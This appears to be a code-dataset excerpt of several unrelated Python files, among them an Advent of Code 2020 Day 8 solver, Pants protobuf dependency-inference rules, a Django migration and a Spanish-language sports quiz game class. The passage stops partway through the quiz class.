text
stringlengths 8
6.05M
|
|---|
# Path to the puzzle input file (Advent of Code 2020, Day 8).
file = "./2020/Day08/mattinput.txt"
def has_infinity(history):
    """Return True when the most recent entry of *history* was already visited.

    *history* is the execution trace: instruction indices in visit order.
    Revisiting any index means the program is in an infinite loop.
    """
    # The original suffix scan was a disguised membership test: its inner
    # comparison checked a slice against itself and was therefore always
    # true, so the function effectively asked "does the last element occur
    # earlier?" in O(n^2).  Ask that question directly instead.
    return len(history) > 1 and history[-1] in history[:-1]
def check_operations(operations, nop_jump_max=-1):
    """Execute the boot code and report whether it loops forever.

    Returns a ``(looped, accumulator)`` tuple: *looped* is True when some
    instruction is about to run a second time, False when execution walks
    past the end of the program.  When *nop_jump_max* selects a nop/jmp
    instruction (via ``switch_jmp_nop``), that single instruction runs with
    its opcode flipped (jmp acts as nop and vice versa).
    """
    flipped = switch_jmp_nop(operations, nop_jump_max)
    acc = 0
    pc = 0
    trace = []
    while True:
        trace.append(pc)
        if has_infinity(trace):
            return True, acc
        if pc >= len(operations):
            return False, acc
        op, arg = operations[pc]
        if op == 'acc':
            acc += arg
            pc += 1
        elif op == 'jmp':
            # This jmp behaves as a nop when it is the flipped instruction.
            pc += 1 if pc == flipped else arg
        elif op == 'nop':
            # This nop behaves as a jmp when it is the flipped instruction.
            pc += arg if pc == flipped else 1
def switch_jmp_nop(operations, nop_jump_max):
    """Return the index of the *nop_jump_max*-th 'nop'/'jmp' instruction.

    Counting is zero-based over nop/jmp instructions only.  Returns -1 when
    *nop_jump_max* is negative (nothing should be flipped) and also when the
    program contains fewer than ``nop_jump_max + 1`` nop/jmp instructions
    (the original implicitly returned None in that case; -1 is the sentinel
    the rest of the code documents).
    """
    seen = 0
    for i, instruction in enumerate(operations):
        # BUG FIX: the original tested the leftover module-level variable
        # `operation` (set by the input-parsing loop) instead of this
        # instruction's own opcode, so every instruction matched.
        if instruction[0] in ('nop', 'jmp'):
            if seen == nop_jump_max:
                return i
            if seen > nop_jump_max:
                # Only reachable when nop_jump_max is negative.
                return -1
            seen += 1
    return -1
# --- driver: parse the puzzle input and solve both parts ---
# NOTE: the loop variable names `operation, number` are kept because
# switch_jmp_nop (as written) reads the module-level `operation` left over
# from this loop.
operations = []
with open(file, 'r') as puzzle_input:
    for row in puzzle_input:
        operation, number = row.split(' ')
        operations.append([operation, int(number)])

# Part 1: accumulator value at the moment the loop is first detected.
keep_going, accumulator = check_operations(operations)
print(f"#1 {accumulator}")

# Part 2: flip each nop/jmp in turn until the program terminates normally.
nop_jump_max = 0
while keep_going:
    keep_going, accumulator = check_operations(operations, nop_jump_max)
    nop_jump_max += 1
print(f"#2 {accumulator}")
|
from django.utils.deprecation import MiddlewareMixin
class TestMid(MiddlewareMixin):
    """Debug middleware that prints a marker line for every incoming request."""

    def process_request(self, request):
        # Returning None tells Django to continue normal request processing.
        print('TESTTESTTESTTESTTESTTEST')
        return None
|
#!/usr/bin/python2.7
# -*- coding:utf-8 -*-
'''
HZ偶尔会拿些专业问题来忽悠那些非计算机专业的同学。
今天测试组开完会后,他又发话了:在古老的一维模式识别中,常常需要计算连续子向量的最大和,
当向量全为正数的时候,问题很好解决。
但是,如果向量中包含负数,是否应该包含某个负数,并期望旁边的正数会弥补它呢?
例如:{6,-3,-2,7,-15,1,2,2},连续子向量的最大和为8(从第0个开始,到第3个为止)。
给一个数组,返回它的最大连续子序列的和,你会不会被他忽悠住?(子向量的长度至少是1)
'''
class Solution:
    def FindGreatestSumOfSubArray(self, array):
        """Kadane's algorithm: maximum sum over all non-empty contiguous
        sub-arrays of *array* (returns 0 for an empty input)."""
        if not array:
            return 0
        best = running = array[0]
        for value in array[1:]:
            # A non-positive running sum can only hurt — restart from here.
            running = value if running <= 0 else running + value
            if running > best:
                best = running
        return best
if __name__ == '__main__':
    # Python 2 print statement — this file targets python2.7 per its shebang.
    print Solution().FindGreatestSumOfSubArray([-1,-3,6,-3,-2,7,-15,1,2,2])
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from typing import FrozenSet
from pants.backend.codegen.protobuf.target_types import (
ProtobufDependenciesField,
ProtobufGrpcToggleField,
)
from pants.build_graph.address import Address
from pants.engine.internals.selectors import Get
from pants.engine.rules import collect_rules, rule
from pants.engine.target import FieldSet, InferDependenciesRequest, InferredDependencies
from pants.engine.unions import UnionRule
from pants.jvm.dependency_inference.artifact_mapper import (
AllJvmArtifactTargets,
UnversionedCoordinate,
find_jvm_artifacts_or_raise,
)
from pants.jvm.dependency_inference.artifact_mapper import rules as artifact_mapper_rules
from pants.jvm.subsystems import JvmSubsystem
from pants.jvm.target_types import JvmResolveField
# Maven coordinates of the core protobuf-java runtime library.
_PROTOBUF_JAVA_RUNTIME_GROUP = "com.google.protobuf"
_PROTOBUF_JAVA_RUNTIME_ARTIFACT = "protobuf-java"
@dataclass(frozen=True)
class ProtobufJavaRuntimeDependencyInferenceFieldSet(FieldSet):
    """Fields read when inferring JVM runtime deps for a protobuf target."""

    required_fields = (
        ProtobufDependenciesField,
        JvmResolveField,
        ProtobufGrpcToggleField,
    )

    # Explicitly declared dependencies of the target.
    dependencies: ProtobufDependenciesField
    # The JVM resolve this target belongs to.
    resolve: JvmResolveField
    # Whether gRPC codegen (and hence the gRPC runtime) is enabled.
    grpc: ProtobufGrpcToggleField
class InferProtobufJavaRuntimeDependencyRequest(InferDependenciesRequest):
    """Inference request registered with the dependency-inference union in rules()."""

    infer_from = ProtobufJavaRuntimeDependencyInferenceFieldSet
@dataclass(frozen=True)
class ProtobufJavaRuntimeForResolveRequest:
    """Request for the protobuf-java runtime artifact within one JVM resolve."""

    resolve_name: str
@dataclass(frozen=True)
class ProtobufJavaRuntimeForResolve:
    """Addresses of the jvm_artifact targets providing the protobuf-java runtime."""

    addresses: FrozenSet[Address]
@rule
async def resolve_protobuf_java_runtime_for_resolve(
    jvm_artifact_targets: AllJvmArtifactTargets,
    jvm: JvmSubsystem,
    request: ProtobufJavaRuntimeForResolveRequest,
) -> ProtobufJavaRuntimeForResolve:
    """Locate the protobuf-java runtime artifact in the requested resolve."""
    runtime_coordinate = UnversionedCoordinate(
        group=_PROTOBUF_JAVA_RUNTIME_GROUP,
        artifact=_PROTOBUF_JAVA_RUNTIME_ARTIFACT,
    )
    matches = find_jvm_artifacts_or_raise(
        required_coordinates=[runtime_coordinate],
        resolve=request.resolve_name,
        jvm_artifact_targets=jvm_artifact_targets,
        jvm=jvm,
        subsystem="the Protobuf Java runtime",
        target_type="protobuf_sources",
    )
    return ProtobufJavaRuntimeForResolve(matches)
@dataclass(frozen=True)
class ProtobufJavaGrpcRuntimeForResolveRequest:
    """Request for the gRPC runtime artifacts within one JVM resolve."""

    resolve_name: str
@dataclass(frozen=True)
class ProtobufJavaGrpcRuntimeForResolve:
    """Addresses of the jvm_artifact targets providing the gRPC runtime."""

    addresses: FrozenSet[Address]
@rule
async def resolve_protobuf_java_grpc_runtime_for_resolve(
    jvm_artifact_targets: AllJvmArtifactTargets,
    jvm: JvmSubsystem,
    request: ProtobufJavaGrpcRuntimeForResolveRequest,
) -> ProtobufJavaGrpcRuntimeForResolve:
    """Locate the gRPC runtime artifacts in the requested resolve."""
    # For non-Android uses.
    # TODO: Maybe support Android jars? See https://github.com/grpc/grpc-java#download for
    # the differences in required jars.
    # TODO: annotations-api is only required for JDK 9+ according to
    # https://github.com/grpc/grpc-java#download.
    runtime_jars = (
        ("io.grpc", "grpc-netty-shaded"),
        ("io.grpc", "grpc-protobuf"),
        ("io.grpc", "grpc-stub"),
        ("org.apache.tomcat", "annotations-api"),
    )
    matches = find_jvm_artifacts_or_raise(
        required_coordinates=[
            UnversionedCoordinate(group=group, artifact=artifact)
            for group, artifact in runtime_jars
        ],
        resolve=request.resolve_name,
        jvm_artifact_targets=jvm_artifact_targets,
        jvm=jvm,
        subsystem="the Protobuf Java gRPC runtime",
        target_type="protobuf_sources",
    )
    return ProtobufJavaGrpcRuntimeForResolve(matches)
@rule
async def infer_protobuf_java_runtime_dependency(
    request: InferProtobufJavaRuntimeDependencyRequest,
    jvm: JvmSubsystem,
) -> InferredDependencies:
    """Infer runtime jar dependencies for a protobuf target.

    Always adds the protobuf-java runtime for the target's resolve; when the
    target's grpc field is enabled, additionally adds the gRPC runtime jars.
    """
    resolve = request.field_set.resolve.normalized_value(jvm)

    protobuf_java_runtime_target_info = await Get(
        ProtobufJavaRuntimeForResolve, ProtobufJavaRuntimeForResolveRequest(resolve)
    )
    addresses: set[Address] = set(protobuf_java_runtime_target_info.addresses)

    if request.field_set.grpc.value:
        grpc_runtime_info = await Get(
            ProtobufJavaGrpcRuntimeForResolve, ProtobufJavaGrpcRuntimeForResolveRequest(resolve)
        )
        addresses.update(grpc_runtime_info.addresses)

    return InferredDependencies(frozenset(addresses))
def rules():
    """Rules for inferring JVM runtime dependencies of protobuf targets."""
    return (
        *collect_rules(),
        *artifact_mapper_rules(),
        # Register this file's inference request with the dependency-inference union.
        UnionRule(InferDependenciesRequest, InferProtobufJavaRuntimeDependencyRequest),
    )
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (translated) "when the delimiter '|' is encountered"
# NOTE(review): Python 2 script (print statement below).
# NOTE(review): index.txt is opened for writing but never written to or
# closed — presumably work in progress; confirm before relying on it.
f = open('index.txt','w')
r = open('r.txt')
# This loop only skips blank lines and otherwise does nothing — looks like
# a placeholder for per-line processing that was never filled in.
for line in r.readlines():
    if not line.strip():
        continue
import linecache
# Print the third line of r.txt.
print linecache.getline('r.txt',3)
|
import setuptools
# Read the long description from the README, decoding explicitly as UTF-8 so
# the build does not depend on the platform's default encoding (e.g. cp1252
# on Windows would raise UnicodeDecodeError on non-ASCII README content).
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name = 'DataChaser',
    version = '1.0.1',
    author = 'SuulCoder',
    author_email = 'saulcontreras@acm.org',
    description = 'This packages autocompletes the information that is lost in a CSV using AI',
    long_description=long_description,
    long_description_content_type="text/markdown",
    url = 'https://github.com//suulcoder/Chasers-of-the-Lost-Data', # use the URL to the github repo
    packages=setuptools.find_packages(),
    classifiers = [
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires=">=3.4"
)
|
# Generated by Django 3.1 on 2020-10-16 06:58
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the many-to-many 'to_people' field to the announcement model."""

    # NOTE(review): initial=True is unusual for a migration that depends on
    # '0002_announcement_to_group' — confirm this flag is intended.
    initial = True

    dependencies = [
        ('announcement', '0002_announcement_to_group'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.AddField(
            model_name='announcement',
            name='to_people',
            # verbose_name '接收人' means "recipients" (user-facing, kept as-is).
            field=models.ManyToManyField(blank=True, related_name='to_people', to=settings.AUTH_USER_MODEL, verbose_name='接收人'),
        ),
    ]
|
#!/usr/bin/python
# -*- coding: latin-1 -*-
"""
Rigoberto Sáenz Imbacuán
Desarrollador para Dispositivos Móviles - Colombia Games
Ingeniero de Sistemas y Computación - Universidad Nacional de Colombia
http://www.rigobertosaenz.com/
"""
from src.Controller import eActivityId, ResourceController, eQuestionAnswer, \
GlobalsController, eGameDifficulty
class Activity:
def __init__(self, id):
self.id = id
self.description = list()
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.question = list()
self.question.append("")
self.question.append("")
self.question.append("")
self.question.append("")
self.optionA = list()
self.optionA.append("")
self.optionA.append("")
self.optionB = list()
self.optionB.append("")
self.optionB.append("")
self.optionC = list()
self.optionC.append("")
self.optionC.append("")
if id == eActivityId._01_BICICROS:
self.name = "Bicicrós"
self.image = ResourceController.game_Activity01Bicicros
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El Bicicrós se originó"
self.description[1] = "en California en 1.970,"
self.description[2] = "cuando los jóvenes"
self.description[3] = "intentaban imitar a"
self.description[4] = "los campeones de otro"
self.description[5] = "deporte usando sus"
self.description[6] = "bicicletas."
self.question[0] = "¿Cuál de estos deportes sería?"
self.optionA[0] = "Ciclismo profesional"
self.optionB[0] = "Motocross"
self.optionC[0] = "Ciclismo de montaña"
elif id == eActivityId._02_PATINAJE:
self.name = "Patinaje"
self.image = ResourceController.game_Activity02Patinaje
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El patinaje puede ser"
self.description[1] = "de dos tipos: El"
self.description[2] = "clásico que se"
self.description[3] = "realiza con patines de"
self.description[4] = "4 ruedas, y el patinaje"
self.description[5] = "en línea que se realiza"
self.description[6] = "con patines que tienen"
self.description[7] = "entre 3 y cinco ruedas"
self.description[8] = "ubicadas en línea recta."
self.question[0] = "¿Cuál de estos crees que es?"
self.optionA[0] = "Skateboard"
self.optionB[0] = "Patinaje"
self.optionC[0] = "Carreras de cuatrimotos"
elif id == eActivityId._03_FUTSAL:
self.name = "Futsal"
self.image = ResourceController.game_Activity03Futsal
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El fútbol de salón es"
self.description[1] = "un deporte colectivo"
self.description[2] = "de pelota practicado"
self.description[3] = "entre dos equipos de 5"
self.description[4] = "jugadores cada uno,"
self.description[5] = "dentro de una cancha"
self.description[6] = "de suelo duro."
self.question[0] = "¿Con qué otro nombre se"
self.question[1] = "conoce este deporte?"
self.optionA[0] = "Balón mano"
self.optionB[0] = "Microfútbol"
self.optionC[0] = "Bochas"
elif id == eActivityId._04_FUTBOL:
self.name = "Fútbol"
self.image = ResourceController.game_Activity04Futbol
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "El fútbol es el deporte"
self.description[1] = "más popular del mundo"
self.description[2] = "que además favorece la"
self.description[3] = "realización de"
self.description[4] = "actividad física."
self.description[5] = "Durante un partido de"
self.description[6] = "fútbol profesional de"
self.description[7] = "90 minutos, un jugador"
self.description[8] = "recorre entre 6 y 11"
self.description[9] = "kilómetros."
self.question[0] = "¿Sabes en cuál país se realizó"
self.question[1] = "el primer mundial de fútbol?"
self.optionA[0] = "Uruguay"
self.optionB[0] = "Brasil"
self.optionC[0] = "Inglaterra"
elif id == eActivityId._05_PORRISMO:
self.name = "Porrismo"
self.image = ResourceController.game_Activity05Porrismo
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "El porrismo consiste en"
self.description[1] = "el uso organizado de"
self.description[2] = "música, baile y"
self.description[3] = "gimnasia para hacer que"
self.description[4] = "los aficionados animen"
self.description[5] = "a sus equipos en los"
self.description[6] = "partidos."
self.question[0] = "¿En cuál de estos deportes"
self.question[1] = "no se hace animación con"
self.question[2] = "porras?"
self.optionA[0] = "Fútbol"
self.optionB[0] = "Baloncesto"
self.optionC[0] = "Ajedrez"
elif id == eActivityId._06_ATLETISMO:
self.name = "Atletismo"
self.image = ResourceController.game_Activity06Atletismo
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es el arte de superar"
self.description[1] = "el rendimiento de los"
self.description[2] = "adversarios en"
self.description[3] = "velocidad, resistencia,"
self.description[4] = "distancia o altura."
self.description[5] = "Contiene un gran"
self.description[6] = "conjunto de disciplinas"
self.description[7] = "agrupadas en carreras,"
self.description[8] = "saltos, lanzamientos,"
self.description[9] = "pruebas combinadas y"
self.description[10]= "marcha."
self.question[0] = "¿Sabes cuál es la carrera"
self.question[1] = "más corta que pueden correr"
self.question[2] = "los atletas?"
self.optionA[0] = "100 metros"
self.optionB[0] = "60 metros"
self.optionC[0] = "200 metros"
elif id == eActivityId._07_BALONCESTO:
self.name = "Baloncesto"
self.image = ResourceController.game_Activity07Baloncesto
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un deporte de equipo,"
self.description[1] = "en el que dos conjuntos"
self.description[2] = "de 5 jugadores cada uno,"
self.description[3] = "intentan anotar puntos,"
self.description[4] = "introduciendo un balón"
self.description[5] = "en un aro colocado a"
self.description[6] = "3,05 metros del suelo."
self.question[0] = "¿Cuánto dura cada uno de"
self.question[1] = "los tiempos de juego?"
self.optionA[0] = "15 minutos"
self.optionB[0] = "10 minutos"
self.optionC[0] = "12 minutos"
elif id == eActivityId._08_KARATE_DO:
self.name = "Karate Do"
self.image = ResourceController.game_Activity08KarateDo
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El Karate Do no solo trata"
self.description[1] = "sobre el acondicionamiento"
self.description[2] = "físico, el estudio de"
self.description[3] = "los katas y el combate"
self.description[4] = "real o deportivo. "
self.description[5] = "También va de la"
self.description[6] = "mano con el desarrollo "
self.description[7] = "vivencial de la parte "
self.description[8] = "humana y la parte "
self.description[9] = "espiritual, el "
self.description[10] = "crecimiento como"
self.description[11] = "personas y ciudadanos."
self.question[0] = "¿Además del componente deportivo,"
self.question[1] = "qué otro componente tiene el"
self.question[2] = "karate Do?"
self.optionA[0] = "Empresarial"
self.optionB[0] = "Espiritual"
self.optionC[0] = "Individual"
elif id == eActivityId._09_LEVANTAMIENTO_DE_PESAS:
self.name = "Levantamiento de Pesas"
self.image = ResourceController.game_Activity09LevantamientoDePesas
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un deporte que "
self.description[1] = "consiste en el "
self.description[2] = "levantamiento de la "
self.description[3] = "mayor cantidad de peso"
self.description[4] = "posible en una barra en"
self.description[5] = "cuyos extremos se fijan"
self.description[6] = "varios discos, los "
self.description[7] = "cuales determinan el "
self.description[8] = "peso final que se "
self.description[9] = "levanta."
self.question[0] = "¿Qué otro nombre recibe el"
self.question[1] = "levantamiento de pesas?"
self.optionA[0] = "Halterofilia"
self.optionB[0] = "Skeleton"
self.optionC[0] = "Biatlón"
elif id == eActivityId._10_TAEKWON_DO:
self.name = "Taekwon Do"
self.image = ResourceController.game_Activity10TaekwonDo
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El Taekwon Do se destaca"
self.description[1] = "por la variedad y"
self.description[2] = "espectacularidad de sus"
self.description[3] = "técnicas de patada, se"
self.description[4] = "basa fundamentalmente"
self.description[5] = "en artes marciales como el"
self.description[6] = "Kung fu o Wu Shu Chino."
self.question[0] = "¿Cuáles de estos tres son los"
self.question[1] = "colores correctos de algunos"
self.question[2] = "grados básicos del taekwon do?"
self.optionA[0] = "Verde, naranja, negro"
self.optionB[0] = "Verde, azul, negro"
self.optionC[0] = "Verde, amarillo, negro"
elif id == eActivityId._11_BADMINTON:
self.name = "Bádminton"
self.image = ResourceController.game_Activity11Badminton
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "A diferencia de otros "
self.description[1] = "deportes de raqueta, en"
self.description[2] = "el bádminton no se juega"
self.description[3] = "con pelota, sino con un"
self.description[4] = "proyectil llamado "
self.description[5] = "volante, plumilla "
self.description[6] = "o gallito."
self.question[0] = "Cada partido de bádminton se"
self.question[1] = "juega a:"
self.optionA[0] = "21 puntos"
self.optionB[0] = "18 puntos"
self.optionC[0] = "25 puntos"
elif id == eActivityId._12_TENIS_DE_MESA:
self.name = "Tenis de Mesa"
self.image = ResourceController.game_Activity12TenisDeMesa
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El tenis de mesa, es un"
self.description[1] = "deporte de raqueta, que"
self.description[2] = "se disputa entre dos"
self.description[3] = "jugadores o dos parejas"
self.description[4] = "(dobles)"
self.question[0] = "¿Con qué otro nombre se conoce"
self.question[1] = "al tenis de mesa?"
self.optionA[0] = "Golf"
self.optionB[0] = "Ping pong"
self.optionC[0] = "Bádminton"
elif id == eActivityId._13_ESGRIMA:
self.name = "Esgrima"
self.image = ResourceController.game_Activity13Esgrima
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "La esgrima es un deporte"
self.description[1] = "de combate en el que se"
self.description[2] = "enfrentan dos "
self.description[3] = "contrincantes que deben"
self.description[4] = "intentar tocarse con un"
self.description[5] = "arma especial, sin"
self.description[6] = "hacerse ningún daño."
self.question[0] = "¿Cuáles de estos crees que son"
self.question[1] = "los nombres de las armas con"
self.question[2] = "las que se practica la"
self.question[3] = "esgrima?"
self.optionA[0] = "Espada, sable, lanza"
self.optionB[0] = "Espada, sable, florete"
self.optionC[0] = "Espada, sable, bayoneta"
elif id == eActivityId._14_GIMNASIA_ARTISTICA:
self.name = "Gimnasia Artística"
self.image = ResourceController.game_Activity14GimnasiaArtistica
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Las presentaciones en la"
self.description[1] = "gimnasia artística son"
self.description[2] = "generalmente"
self.description[3] = "individuales y tienen"
self.description[4] = "una duración promedio"
self.description[5] = "entre treinta y noventa"
self.description[6] = "segundos, que se"
self.description[7] = "realizan en diferentes"
self.description[8] = "aparatos o en el suelo"
self.description[9] = "usando elementos como"
self.description[10]= "balones o cintas."
self.question[0] = "¿Cuál de estas ideas sobre"
self.question[1] = "la gimnasia es correcta?"
self.optionA[0] = "La gimnasia es muy difícil"
self.optionA[1] = "para los hombres"
self.optionB[0] = "Para practicar gimnasia solo"
self.optionB[1] = "hay que ser flexible"
self.optionC[0] = "La gimnasia puede ser practicada"
self.optionC[1] = "por hombres y por mujeres"
elif id == eActivityId._15_AJEDREZ:
self.name = "Ajedrez"
self.image = ResourceController.game_Activity15Ajedrez
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El ajedrez es un juego "
self.description[1] = "competitivo entre dos "
self.description[2] = "personas, cada una de "
self.description[3] = "las cuales dispone de"
self.description[4] = "16 piezas móviles que "
self.description[5] = "se colocan sobre un "
self.description[6] = "tablero dividido en "
self.description[7] = "64 partes."
self.question[0] = "¿Cuáles de las siguientes son"
self.question[1] = "piezas del ajedrez?"
self.optionA[0] = "Dama, caballo, lacayo"
self.optionB[0] = "Dama, alfil, caballo"
self.optionC[0] = "Dama, caballo, sainete"
elif id == eActivityId._16_AEROBICOS:
self.name = "Aeróbicos"
self.image = ResourceController.game_Activity16Aerobicos
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El ejercicio aeróbico "
self.description[1] = "mejora la función "
self.description[2] = "cardiovascular, reduce"
self.description[3] = "grasa corporal, baja los"
self.description[4] = "niveles de colesterol "
self.description[5] = "total en la sangre y"
self.description[6] = "mejora la capacidad "
self.description[7] = "pulmonar, la circulación"
self.description[8] = "en general y el "
self.description[9] = "aprovechamiento del "
self.description[10] = "oxígeno."
self.question[0] = "¿Cuál de los siguientes"
self.question[1] = "beneficios es generado"
self.question[2] = "al prácticar aeróbicos?"
self.optionA[0] = "Mejora la digestión"
self.optionB[0] = "Mejora la capacidad pulmonar"
self.optionC[0] = "Mejora la capacidad de pensar"
elif id == eActivityId._17_NATACION:
self.name = "Natación"
self.image = ResourceController.game_Activity17Natacion
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "La natación es el "
self.description[1] = "movimiento y/o "
self.description[2] = "desplazamiento a través"
self.description[3] = "del agua mediante el uso"
self.description[4] = "de los brazos y las"
self.description[5] = "piernas y por lo "
self.description[6] = "general sin utilizar"
self.description[7] = "ningún instrumento "
self.description[8] = "artificial."
self.question[0] = "¿Cuáles de estos son los"
self.question[1] = "estilos de natación?"
self.optionA[0] = "Pecho, mariposa y espalda"
self.optionB[0] = "Mariposa, espalda y relevos"
self.optionC[0] = "Pecho, mariposa y subacuático"
elif id == eActivityId._18_BOXEO:
self.name = "Boxeo"
self.image = ResourceController.game_Activity18Boxeo
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es un deporte de combate"
self.description[1] = "en el que dos "
self.description[2] = "contrincantes luchan"
self.description[3] = "utilizando únicamente "
self.description[4] = "sus puños con guantes,"
self.description[5] = "golpeando a su "
self.description[6] = "adversario de la cintura"
self.description[7] = "hacia arriba, dentro de "
self.description[8] = "un cuadrilátero, en "
self.description[9] = "breves secuencias de "
self.description[10] = "lucha."
self.question[0] = "¿Cómo se llaman las secuencias"
self.question[1] = "de lucha en un combate de boxeo?"
self.optionA[0] = "Momentos o tiempos"
self.optionB[0] = "Asaltos o rounds"
self.optionC[0] = "Saltos o esperas"
elif id == eActivityId._19_EQUITACION:
self.name = "Equitación"
self.image = ResourceController.game_Activity19Equitacion
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "La equitación es el arte"
self.description[1] = "de mantener el control "
self.description[2] = "preciso sobre un caballo,"
self.description[3] = "así como los diferentes"
self.description[4] = "modos de manejarlo. La "
self.description[5] = "equitación implica "
self.description[6] = "también los "
self.description[7] = "conocimientos para "
self.description[8] = "cuidar caballos y el uso"
self.description[9] = "del equipo apropiado."
self.question[0] = "El equipo para montar a"
self.question[1] = "caballo se llama:"
self.optionA[0] = "Silla"
self.optionB[0] = "Montura"
self.optionC[0] = "Aparejos o arreos"
elif id == eActivityId._20_GOLF:
self.name = "Golf"
self.image = ResourceController.game_Activity20Golf
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El golf es un deporte de"
self.description[1] = "precisión cuyo objetivo "
self.description[2] = "es introducir una bola "
self.description[3] = "en los hoyos que están "
self.description[4] = "distribuidos en el campo"
self.description[5] = "con el menor número de"
self.description[6] = "golpes."
self.question[0] = "Si vas a practicar golf el"
self.question[1] = "equipo que necesitas es:"
self.optionA[0] = "Pelota y guantes"
self.optionB[0] = "Palos y pelota"
self.optionC[0] = "Pelota y bate"
elif id == eActivityId._21_JUDO:
self.name = "Judo"
self.image = ResourceController.game_Activity21Judo
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "El Judo es uno de los "
self.description[1] = "cuatro estilos "
self.description[2] = "principales de lucha"
self.description[3] = "deportiva más "
self.description[4] = "practicados hoy en día "
self.description[5] = "en todo el mundo. Los "
self.description[6] = "practicantes de este "
self.description[7] = "arte son denominados "
self.description[8] = "Judocas."
self.question[0] = "¿Por cuál de esas razones crees"
self.question[1] = "que el judo es un deporte muy"
self.question[2] = "bueno para niños y jóvenes?"
self.optionA[0] = "Incluye ejercicios como"
self.optionA[1] = "saltar, rodar y arrastrarse"
self.optionB[0] = "Es más fácil practicarlo"
self.optionB[1] = "en estas edades"
self.optionC[0] = "Es muy seguro y da"
self.optionC[1] = "buena salud"
elif id == eActivityId._22_RUGBY:
self.name = "Rugby"
self.image = ResourceController.game_Activity22Rugby
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es un deporte de equipo"
self.description[1] = "jugado por dos equipos "
self.description[2] = "de 13 jugadores, el "
self.description[3] = "objetivo del juego "
self.description[4] = "consiste en apoyar un"
self.description[5] = "balón ovalado en el "
self.description[6] = "suelo con las manos "
self.description[7] = "sobre o tras la línea"
self.description[8] = "de ensayo."
self.question[0] = "¿Cuál de estas es una"
self.question[0] = "diferencia entre el rugby"
self.question[0] = "y el fútbol americano?"
self.optionA[0] = "En el rugby se mete gol en un arco y en el"
self.optionA[1] = "fútbol americano se hace gol son postes"
self.optionB[0] = "El partido de rugby dura 80 minutos y el"
self.optionB[1] = "de fútbol americano 60 minutos"
self.optionC[0] = "El material de la cancha de rugby es pasto y del"
self.optionC[1] = "fútbol americano es césped artificial"
elif id == eActivityId._23_TENIS:
self.name = "Tenis"
self.image = ResourceController.game_Activity23Tenis
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El tenis se practica en"
self.description[1] = "un terreno rectangular,"
self.description[2] = "dividido por una red "
self.description[3] = "intermedia. Se disputa"
self.description[4] = "entre dos jugadores "
self.description[5] = "o entre dos parejas"
self.description[6] = "y consiste en golpear"
self.description[7] = "la pelota con la"
self.description[8] = "raqueta para que vaya de"
self.description[9] = "un lado al otro del"
self.description[10] = "campo pasando por"
self.description[11] = "encima de la red."
self.question[0] = "¿Qué forma tiene el terreno"
self.question[1] = "donde se practica tenis?"
self.optionA[0] = "Redonda"
self.optionB[0] = "Rectangular"
self.optionC[0] = "Cuadrada"
elif id == eActivityId._24_VOLEIBOL:
self.name = "Voleibol"
self.image = ResourceController.game_Activity24Voleibol
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un deporte donde dos"
self.description[1] = "equipos se enfrentan "
self.description[2] = "separados por una red "
self.description[3] = "central, tratando de "
self.description[4] = "pasar el balón por "
self.description[5] = "encima de la red hacia "
self.description[6] = "el suelo del campo "
self.description[7] = "contrario. Cada equipo"
self.description[8] = "dispone de un número "
self.description[9] = "limitado de toques para"
self.description[10] = "devolver el balón hacia"
self.description[11] = "el campo contrario."
self.question[0] = "¿Qué otro nombre tiene el"
self.question[1] = "voleibol?"
self.optionA[0] = "Balonvolea"
self.optionB[0] = "Volei de playa"
self.optionC[0] = "Mintonette"
elif id == eActivityId._25_HOCKEY:
self.name = "Hockey"
self.image = ResourceController.game_Activity25Hockey
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Es un deporte en el que "
self.description[1] = "dos equipos compiten "
self.description[2] = "para llevar una pelota "
self.description[3] = "de un material duro o un"
self.description[4] = "disco de caucho a la "
self.description[5] = "portería contraria para "
self.description[6] = "anotar un tanto con la "
self.description[7] = "ayuda de un bastón largo"
self.description[8] = "o Palo de Hockey."
self.question[0] = "¿Cuáles de estas son"
self.question[1] = "modalidades del hockey?"
self.optionA[0] = "Césped, hielo y granito"
self.optionB[0] = "Hielo, en línea y"
self.optionB[1] = "superficie lisa"
self.optionC[0] = "Césped, hielo y en línea"
elif id == eActivityId._26_TEATRO:
self.name = "Teatro"
self.image = ResourceController.game_Activity26Teatro
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El teatro es la rama"
self.description[1] = "del arte relacionada"
self.description[2] = "con la actuación, que"
self.description[3] = "representa historias"
self.description[4] = "frente a una audiencia"
self.description[5] = "usando una combinación"
